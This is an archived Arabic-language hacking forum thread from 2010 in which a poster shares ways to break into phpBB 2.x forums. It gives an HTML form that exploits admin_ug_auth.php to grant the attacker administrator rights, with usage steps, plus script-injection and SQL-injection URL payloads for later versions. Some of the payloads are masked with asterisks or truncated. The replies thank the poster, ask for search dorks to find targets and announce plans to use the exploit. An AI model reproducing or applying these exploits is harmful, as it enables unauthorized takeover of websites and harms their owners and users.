:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   بعــــض ثغرات منتدى phpbb ادخل وشــــوف (http://www.vbspiders.com/vb/t24177.html)

Hacker X4X 01-24-2010 05:45 PM

بعــــض ثغرات منتدى phpbb ادخل وشــــوف
 
[align=center]!بســــــــــــم الله الرحمـــــــــــــــــــــــــــــــــن الرحيـــــــــــــــــــــــــــــــــــم ![/align]
بعـــض طرق اختـــراق منتدى phpbb
ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت

الأصدار:
2.0.0[align=center]
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها[/align]
كود PHP:
<html>
<head>
</head>
******>

<form method="post"
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



::::::::
ثغره فى الاصدار Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
كود PHP:
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>********.write(********.******);</s cript>&category_rows[0][cat_order]=99
ثغره فى الاصدار Powered by phpBB 2.0.9

كل ما عليك هو تطبق هذا الكود


كود PHP:
http://www.xxxxx.com/privmsg.php?fo...20LIMI T%201

[align=center]اخوكم Hacker X4X[/align]

Dr.NaNo 01-24-2010 06:36 PM

يعطيك العافيه ياوحش [ واصل إلى الامام ] :)


بس وش اسم [ الدراك ، عشان أحطه بقوقل ] :)


تحياتي لكـ ياغالي .

~ْ R.ZoRo ~ْ 01-24-2010 07:40 PM

تسلم على الثغرة
اما بالنسبة الى لدورك
ممكن تكتب اسم السكربت
Powered by phpBB 2.0.6
يعني مش مشكلة الدورك


the cold zero 01-24-2010 07:45 PM

تسلم ايديك يا غالى
جارى الدعس

KaLa$nikoV 01-24-2010 10:07 PM

تسلم ع الثغره


هذا النوع من المنتديات ما بفيد كثير دخول لوحه التحكم



اجدد شكري

LiLo-HacKeR-Dz 02-11-2010 09:08 PM

واصل ممتاز شكرا على المجهودات

http://img218.imageshack.us/img218/2613/14085515jx9.jpg

الشيطان المميت 11-09-2010 05:29 AM

ثغره فاشله يا حبايب من أول ما نزلت


و اتحدى أي شخص يقولي انه غخترق عن طريقها

rx.1 11-10-2010 03:30 AM

شكرا اخوي يا شباب حدا بيعرف شي ثغرة بالاصدار 3 من هالنوع من المنتديات

Xbacher 03-25-2015 09:54 PM

رد: بعــــض ثغرات منتدى phpbb ادخل وشــــوف
 
tnkkkkkkkkkkkkkkkssss


الساعة الآن 12:31 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0